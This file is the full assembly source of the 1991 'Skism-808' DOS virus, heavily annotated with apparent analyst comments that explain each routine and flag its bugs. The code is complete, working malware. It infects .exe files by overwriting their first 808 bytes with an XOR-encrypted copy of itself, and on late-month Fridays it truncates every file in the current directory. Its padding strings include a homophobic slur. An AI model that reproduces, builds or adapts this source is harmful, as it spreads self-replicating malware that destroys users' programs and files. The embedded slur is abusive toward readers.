;tHE sKISM 808 vIRUS. cREATED 1991 BY sMART kIDS iNTO sICK mETHODS.
;Offsets into a DOS find-first/find-next DTA record. The code passes
;DIRDATA+FILENAME / FILEDATA+FILENAME as the ASCIIZ name to chdir/open, and
;reads the date/time words out of FILEDATA in TRANSFORM.
FILENAME equ 30 ;USED TO FIND FILE NAME (ASCIIZ name of the matched entry)

FILEATTR equ 21 ;USED TO FIND FILE ATTRIBUTES (loaded once in TRANSFORM and
                ;immediately overwritten, so effectively unused; the attribute
                ;is fetched with AX=4300H instead)

FILEDATE equ 24 ;USED TO FIND FILE DATE (saved to ORIG_DATE)

FILETIME equ 22 ;USED TO FIND FILE TIME (saved to ORIG_TIME)

CODE_START equ 0100H ;START OF ALL .com FILES - also the first byte INFECTFILE writes

VIRUS_SIZE equ 808 ;tr 808 - bytes written into a victim by INFECTFILE and the
                   ;length of the XOR loop in ENCRYPT (the text at the end pads
                   ;the image to this size)
;Single code segment, MASM/TASM-style directives (SEGMENT/ASSUME/PROC/OFFSET),
;despite the page's "NASM" label. ASSUME declares that CS, DS and ES all
;address this one segment; every OFFSET below is relative to it.
CODE SEGMENT 'CODE'

ASSUME CS:CODE,DS:CODE,ES:CODE

ORG CODE_START ;.COM entry at 0100H; INFECTFILE reads the image from here
;Entry stub. Everything before the VIRUS_CODE label (this JMP, the key byte,
;the CALL/JMP pair, ENCRYPT and INFECTFILE) is outside the XOR range, so a
;victim file stores it in clear together with the one-byte key.
MAIN PROC NEAR

JMP VIRUS_START ;first bytes of an infected file; TRANSFORM compares them with 02EBH

ENCRYPT_VAL DB 00H ;one-byte XOR key, set from the clock (DL of AH=2CH) in VIRUS.
                   ;Stored unencrypted, so the body of any sample is trivially
                   ;recoverable: XOR bytes from VIRUS_CODE on with this byte.

VIRUS_START:

CALL ENCRYPT ;ENCRYPT/DECRYPT FILE - here: decrypt VIRUS_CODE.. in place

JMP VIRUS ;GO TO START OF CODE (now plaintext)
;ENCRYPT - in-place XOR of the body with ENCRYPT_VAL. Symmetric, so the same
;call decrypts at VIRUS_START and encrypts/decrypts around the write in INFECTFILE.
;In:    ENCRYPT_VAL = key; DS = this segment
;Out:   bytes [VIRUS_CODE .. VIRUS_CODE+VIRUS_SIZE] XORed (inclusive, see note)
;Clobb: BX, CH, flags. CX is saved/restored; BX is NOT, so callers push it.
;NOTE(review): the bound is VIRUS_CODE+VIRUS_SIZE with JLE, so the loop touches
;VIRUS_SIZE+1 bytes starting at VIRUS_CODE. Since VIRUS_CODE is not CODE_START,
;that runs past the end of an 808-byte image by (VIRUS_CODE-CODE_START)+1 bytes.
;Harmless in practice: each call is paired with an undo, and INFECTFILE only
;writes VIRUS_SIZE bytes from CODE_START.
ENCRYPT:

PUSH CX

MOV BX,OFFSET VIRUS_CODE ;START ENCRYPTION AT DATA (stub before this label stays in clear)

XOR_LOOP:

MOV CH,[BX] ;READ CURRENT BYTE

XOR CH,ENCRYPT_VAL ;GET ENCRYPTION KEY (a key of 0 leaves the body unchanged)

MOV [BX],CH ;SWITCH BYTES

INC BX ;MOVE BX UP A BYTE

CMP BX,OFFSET VIRUS_CODE+VIRUS_SIZE

;ARE WE DONE WITH THE ENCRYPTION (signed compare; offsets here are far below 8000H)

JLE XOR_LOOP ;NO? KEEP GOING

POP CX

RET
;INFECTFILE - overwrite the start of the already-open victim with this image.
;In:    HANDLE = handle opened read/write (3D02H) in DOIT, at file position 0
;       (nothing in this code ever seeks).
;Does:  encrypt body -> write VIRUS_SIZE bytes from CODE_START -> decrypt body,
;       so the on-disk copy is plaintext stub + XORed body, and the running
;       copy is restored.
;NOTE(review): the host's first 808 bytes are replaced, not displaced - the
;original program is destroyed. The AH=40H result (CF / AX = bytes written) is
;never checked, and the handle is not closed here; the 3EH calls in DOIT and
;ROLLOUT are commented out, so it stays open until process exit.
INFECTFILE:

MOV DX,CODE_START ;WHERE VIRUS STARTS IN MEMORY (DS:DX = write buffer)

MOV BX,HANDLE ;LOAD BX WITH HANDLE

PUSH BX ;SAVE HANDLE ON STACK (ENCRYPT uses BX as its pointer)

CALL ENCRYPT ;ENCRYPT FILE

POP BX ;GET BACK BX

MOV CX,VIRUS_SIZE ;NUMBER OF BYTES TO WRITE

MOV AH,40H ;WRITE TO FILE

INT 21H ;

PUSH BX

CALL ENCRYPT ;FIX UP THE MESS (XOR again = decrypt the running copy)

POP BX

RET
;Data area. Everything from this label on - these buffers AND the code at
;VIRUS: below - is what ENCRYPT XORs, so these strings are only visible in
;clear in a sample whose key byte happened to be 0.
VIRUS_CODE:

WILDCARDS DB "*",0 ;SEARCH FOR DIRECTORY ARGUMENT (used with attr 13H in SCANDIRS)

FILESPEC DB "*.exe",0 ;SEARCH FOR exe FILE ARGUMENT (victim spec used in SCANDIR;
                      ;the comment there says *.com, the string is *.exe)

FILESPEC2 DB "*.*",0 ;payload spec: every entry in the current directory

ROOTDIR DB "\",0 ;ARGUMENT FOR ROOT DIRECTORY

DIRDATA DB 43 DUP (?) ;HOLDS DIRECTORY dta (find state for the root walk)

FILEDATA DB 43 DUP (?) ;HOLDS FILES dta (find state for *.exe inside one directory)

DISKDTASEG DW ? ;HOLDS DISK DTA SEGMENT (saved in CHDIR, loaded into DS in NEXTEXE)

DISKDTAOFS DW ? ;HOLDS DISK DTA OFFSET

TEMPOFS DW ? ;HOLDS OFFSET (DTA saved in TRANSFORM, restored in FIXUP)

TEMPSEG DW ? ;HOLDS SEGMENT

DRIVECODE DB ? ;HOLDS DRIVE CODE (declared but never referenced; the drive number
               ;only ever lives in DL)

CURRENTDIR DB 64 DUP (?) ;SAVE CURRENT DIRECTORY INTO THIS (filled by AH=47H in
                         ;NEWDIR, used to chdir back in ROLLOUT)

HANDLE DW ? ;HOLDS FILE HANDLE (set in TRANSFORM and again in DOIT)

ORIG_TIME DW ? ;HOLDS FILE TIME (copied from the DTA, restored via 5701H)

ORIG_DATE DW ? ;HOLDS FILE DATE

ORIG_ATTR DW ? ;HOLDS FILE ATTR (from AX=4300H, restored via 4301H in ROLLOUT -
               ;only for the last file examined)

IDBUFFER DW 2 DUP (?) ;HOLDS VIRUS ID (first two bytes of a candidate; only the
                      ;first word is compared, with 02EBH)
;Main body (runs decrypted). Version gate, pick the XOR key from the clock,
;remember the start directory, then start walking the root of the current drive.
VIRUS:

MOV AX,3000H ;GET DOS VERSION

INT 21H ;

CMP AL,02H ;IS IT AT LEAST 2.00?

JB BUS1 ;WON'T INFECT LESS THAN 2.00 (BUS1 -> BUS -> ROLLOUT, which still issues
        ;its 5701H/4301H restore calls with HANDLE/ORIG_* never set, then runs
        ;the payload date check)

MOV AH,2CH ;GET TIME

INT 21H ;

MOV ENCRYPT_VAL,DL ;SAVE M_SECONDS TO ENCRYPT VAL SO (hundredths, 0..99; a 0 means
                   ;the body is written unencrypted)

;THERES 100 MUTATIONS POSSIBLE

SETDTA:

MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA

MOV AH,1AH ;SET DTA ADDRESS

INT 21H ;

NEWDIR:

MOV AH,19H ;GET DRIVE CODE (AL, 0-based)

INT 21H ;

MOV DL,AL ;SAVE DRIVECODE

INC DL ;ADD ONE TO DL, BECAUSE FUNCTIONS DIFFER (AH=47H counts drives from 1)

MOV AH,47H ;GET CURRENT DIRECTORY

MOV SI, OFFSET CURRENTDIR ;BUFFER TO SAVE DIRECTORY IN (ROLLOUT chdirs back here)

INT 21H ;

MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY

MOV AH,3BH ;CHANGE DIRECTORY TO ROOT

INT 21H ;

SCANDIRS:

MOV CX,13H ;INCLUDE HIDDEN/RO DIRECTORYS (10H dir | 02H hidden | 01H read-only;
           ;presumably ordinary files in the root match "*" too, since the
           ;search attribute is inclusive - see the chdir note in CHDIR)

MOV DX, OFFSET WILDCARDS ;LOOK FOR '*'

MOV AH,4EH ;FIND FIRST FILE

INT 21H ;

CMP AX,12H ;NO FIRST FILE? (only the "no more files" code is tested; CF is ignored)

JNE DIRLOOP ;NO DIRS FOUND? BAIL OUT - NOTE(review): on success this jumps straight
            ;to the find-NEXT in DIRLOOP, so the first root entry returned here is
            ;never visited. AX=12H falls into BUS1 (no infection at all).
;Trampoline for the DOS-version gate in VIRUS (presumably so the 8-bit
;conditional jump there can reach ROLLOUT via BUS).
BUS1:

JMP BUS
;Outer loop over root entries: take the next "*" match, chdir into it, switch
;the DTA to FILEDATA and fall into SCANDIR. Expects the DTA to be DIRDATA on
;entry (set in SETDTA, put back at the end of NEXTEXE).
DIRLOOP:

MOV AH,4FH ;FIND NEXT FILE (continues the "*" search in the root)

INT 21H ;

CMP AX,12H

JE BUS ;NO MORE DIRS FOUND, ROLL OUT

CHDIR:

MOV DX,OFFSET DIRDATA+FILENAME ;POINT DX TO FCB - FILENAME (ASCIIZ name from the DTA)

MOV AH,3BH ;CHANGE DIRECTORY

INT 21H ;NOTE(review): CF is not checked. If the entry is a plain file the chdir
        ;fails silently and the *.exe scan below simply runs in the root again.

MOV AH,2FH ;GET CURRENT DTA ADDRESS (ES:BX - our own DIRDATA at this point)

INT 21H ;

MOV [DISKDTASEG],ES ;SAVE OLD SEGMENT

MOV [DISKDTAOFS],BX ;SAVE OLD OFFSET

MOV DX,OFFSET FILEDATA ;OFFSET OF WHERE TO HOLD NEW DTA (separate record, so the
                       ;root search state in DIRDATA survives the inner scan)

MOV AH,1AH ;SET DTA ADDRESS

INT 21H ;
;Inner loop inside one directory: find the first/next *.exe and hand it to
;TRANSFORM. When the directory is exhausted, return to the root, put the DTA
;back to DIRDATA and resume the outer loop.
SCANDIR:

MOV CX,07H ;FIND ANY ATTRIBUTE (read-only | hidden | system, plus normal files)

MOV DX,OFFSET FILESPEC ;POINT DX TO "*.exe",0 (the original comment said *.com)

MOV AH,4EH ;FIND FIRST FILE FUNCTION

INT 21H ;

CMP AX,12H ;WAS FILE FOUND?

JNE TRANSFORM

NEXTEXE:
;Also the resume point after a skipped candidate (FIXUP jumps here).

MOV AH,4FH ;FIND NEXT FILE

INT 21H ;

CMP AX,12H ;NONE FOUND

JNE TRANSFORM ;FOUND SEE WHAT WE CAN DO

MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY

MOV AH,3BH ;CHANGE DIRECTORY TO ROOT

INT 21H ;

MOV AH,1AH ;SET DTA ADDRESS

MOV DS,[DISKDTASEG] ;RESTORE OLD SEGMENT
                    ;NOTE(review): DS is reloaded and never put back. The next
                    ;instruction and every later DS-relative access depend on
                    ;the saved segment being this program's own - which it is,
                    ;because the DTA was DIRDATA when AH=2FH read it. Fragile,
                    ;but not a failure in practice.

MOV DX,[DISKDTAOFS] ;RESTORE OLD OFFSET (read through the DS just loaded)

INT 21H ;

JMP DIRLOOP
;Exit path for "root exhausted" (DIRLOOP) and the DOS<2 gate (via BUS1).
BUS:

JMP ROLLOUT
;TRANSFORM - examine the candidate named in FILEDATA: save its timestamp and
;attributes, strip the attributes, read its first two bytes and test the
;infection marker. Jumps to DOIT (infect) when the marker is absent, falls
;into FIXUP (skip) when it is present.
;NOTE(review): attributes are cleared here for every candidate but restored
;only in ROLLOUT, which runs once, for the last file touched. Every candidate
;that is skipped (already infected, or open failure) is left with attributes 0.
TRANSFORM:

MOV AH,2FH ;TEMPORALLY STORE DTA (ES:BX = FILEDATA at this point)

INT 21H ;

MOV [TEMPSEG],ES ;SAVE OLD SEGMENT

MOV [TEMPOFS],BX ;SAVE OLD OFFSET

MOV DX, OFFSET FILEDATA + FILENAME ;DS:DX = ASCIIZ name of the candidate for the calls below

MOV BX,OFFSET FILEDATA ;SAVE FILE...

MOV AX,[BX]+FILEDATE ;DATE

MOV ORIG_DATE,AX ;

MOV AX,[BX]+FILETIME ;TIME

MOV ORIG_TIME,AX ; AND

MOV AX,[BX]+FILEATTR ;attribute byte - dead load, AX is overwritten on the next line

MOV AX,4300H ;get file attributes -> CX

INT 21H

MOV ORIG_ATTR,CX

MOV AX,4301H ;CHANGE ATTRIBUTES

XOR CX,CX ;CLEAR ATTRIBUTES (drops read-only/hidden/system so the open and the
          ;later write succeed)

INT 21H ;

MOV AX,3D00H ;OPEN FILE - READ

INT 21H ;

JC FIXUP ;ERROR - FIND ANOTHER FILE (attributes stay cleared, see note above)

MOV HANDLE,AX ;SAVE HANDLE

MOV AH,3FH ;READ FROM FILE

MOV BX,HANDLE ;MOVE HANDLE TO BX

MOV CX,02H ;READ 2 BYTES

MOV DX,OFFSET IDBUFFER ;SAVE TO BUFFER (read result / CF not checked)

INT 21H ;

MOV AH,3EH ;CLOSE FILE FOR NOW

MOV BX,HANDLE ;LOAD BX WITH HANDLE

INT 21H ;

MOV BX, IDBUFFER ;FILL BX WITH ID STRING (first two file bytes as a little-endian word)

CMP BX,02EBH ;INFECTED? 02EBH = bytes EB 02, a short JMP +2 - the marker this code
             ;expects at offset 0 of its own stub. Whether the forward JMP
             ;VIRUS_START really assembles to EB 02 (with a padding NOP) depends on
             ;the assembler's forward-jump encoding - confirm on a built sample.

JNE DOIT ;marker absent -> infect. Marker present -> fall through into FIXUP and
         ;skip (the original "SAME - FIND ANOTHER FILE" comment described the
         ;fall-through, not the jump).
;FIXUP - skip this candidate: put the DTA back (it is still FILEDATA, so in
;practice a no-op) and continue with the next *.exe.
;NOTE(review): same pattern as NEXTEXE - DS is reloaded from TEMPSEG and never
;restored; it works only because TEMPSEG is this program's own segment.
FIXUP:

MOV AH,1AH ;SET DTA ADDRESS

MOV DS,[TEMPSEG] ;RESTORE OLD SEGMENT (DS is not put back afterwards)

MOV DX,[TEMPOFS] ;RESTORE OLD OFFSET (read through the DS just loaded)

INT 21H ;

JMP NEXTEXE
;DOIT - infect the candidate named in FILEDATA, then fall through into
;ROLLOUT. Consequently at most ONE file is infected per run.
DOIT:

MOV DX, OFFSET FILEDATA + FILENAME

MOV AX,3D02H ;OPEN FILE READ/WRITE ACCESS

INT 21H ;

MOV HANDLE,AX ;SAVE HANDLE (CF not checked: on failure AX is an error code and
              ;INFECTFILE/ROLLOUT go on to use it as a handle)

CALL INFECTFILE ;overwrites the first VIRUS_SIZE bytes of the file in place -
                ;the host program is destroyed, not prepended to

;MOV AX,3EH ;CLOSE FILE (disabled in the original; the close elsewhere in this
;           ;file uses AH=3EH, so as written this would not have been a close
;           ;call anyway. The handle stays open until process exit.)

;INT 21H
;ROLLOUT - common exit: put the last file's timestamp and attributes back,
;return to the directory the program was started from, then test the payload
;trigger. Reached after one infection (fall-through from DOIT), when the root
;walk is exhausted (BUS), or on DOS < 2 (BUS1) - in that last case HANDLE and
;ORIG_* were never set.
ROLLOUT:

MOV AX,5701H ;RESTORE ORIGINAL (set date/time on the still-open handle)

MOV BX,HANDLE ;

MOV CX,ORIG_TIME ;TIME AND

MOV DX,ORIG_DATE ;DATE

INT 21H ;

MOV AX,4301H ;RESTORE ORIGINAL ATTRIBUTES (only for this one file - see TRANSFORM)

MOV CX,ORIG_ATTR

MOV DX,OFFSET FILEDATA + FILENAME

INT 21H

;MOV BX,HANDLE

;MOV AX,3EH ;CLOSE FILE (still disabled; nothing in this file closes the handle)

;INT 21H

MOV AH,3BH ;TRY TO FIX THIS

MOV DX,OFFSET ROOTDIR ;FOR SPEED (presumably because AH=47H stores the path
                      ;without a leading "\": going to the root first makes the
                      ;relative chdir below land back where we started)

INT 21H ;

MOV AH,3BH ;CHANGE DIRECTORY

MOV DX,OFFSET CURRENTDIR ;BACK TO ORIGINAL

INT 21H ;

;Payload trigger. AH=2AH: CX=year, DH=month, DL=day, AL=weekday (the code
;treats 5 as Friday). Fires when year >= 1991 AND day >= 25 AND weekday == 5,
;i.e. a Friday falling on the 25th..31st of any month.
MOV AH,2AH ;CHECK SYSTEM DATE

INT 21H ;

CMP CX,1991 ;IS IT AT LEAST 1991?

JB AUDI ;NO? DON'T DO IT NOW

CMP DL,25 ;IS IT THE 25TH? (or later - only "below 25" skips)

JB AUDI ;NOT YET? QUIT

CMP AL,5 ;IS fRIDAY?

JNE AUDI ;NO? QUIT
;Destructive payload. Runs in the directory just restored above (where the
;program was launched): every entry matching *.* is re-created with AH=3CH,
;which truncates it to zero length.
MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA

MOV AH,1AH ;SET DTA ADDRESS

INT 21H ;

MOV AH,4EH ;FIND FIRST FILE

MOV CX,7H ;read-only | hidden | system, plus normal files

MOV DX,OFFSET FILESPEC2 ;OFFSET *.*

lOOPS:
;Loop entry: AH = 4EH on the first pass, 4FH on every later one.

INT 21H ;

JC AUDI ;ERROR? THEN QUIT (this is also how "no more files" ends the loop)

MOV AX,4301H ;FIND ALL NORMAL FILES (actually: clear attributes)
             ;NOTE(review): DX still points at FILESPEC2 ("*.*"), not at the
             ;found name, so this 4301H is issued against a wildcard string and
             ;its result is ignored. The truncate below is what does the damage.

XOR CX,CX ;

INT 21H ;

MOV DX,OFFSET DIRDATA + FILENAME

MOV AH,3CH ;create/truncate the found file with attributes CX=0 - existing
           ;contents are destroyed

INT 21H ;

JC AUDI ;ERROR? QUIT - the new handle returned in AX is never closed, so every
        ;truncated file costs one handle; presumably the loop ends early via
        ;this JC once the process runs out of handles.

MOV AH,4FH ;FIND NEXT FILE

JMP LOOPS ;
;AUDI - terminate with exit code 0. Nothing else in this file closes the
;infected file's handle or the handles leaked by the payload loop; they are
;released only by the process exit here.
AUDI:

MOV AX,4C00H ;END PROGRAM

INT 21H ;
;tHE BELOW IS JUST TEXT TO PAD OUT THE VIRUS SIZE TO 808 BYTES. dON'T
;JUST CHANGE THE TEXT AND CLAIM THAT THIS IS YOUR CREATION.
;(Analyst note: these strings lie inside the XORed region, so they appear in
;clear only in a sample whose key byte was 0. The 808-byte total is what
;VIRUS_SIZE, the write in INFECTFILE and the XOR loop in ENCRYPT rely on.)

WORDS_ DB "sKISM rYTHEM sTACK vIRUS-808. sMART kIDS iNTO sICK mETHODS",0

WORDS2 DB " dONT ALTER THIS CODE INTO YOUR OWN STRAIN, FAGGIT. ",0

WORDS3 DB " hr/sss nycITY, THIS IS THE FIFTH OF MANY, MANY MORE....",0

WORDS4 DB " yOU SISSYS.....",0
MAIN ENDP

CODE ENDS

END MAIN ;entry point = MAIN, i.e. the JMP VIRUS_START stub at CODE_START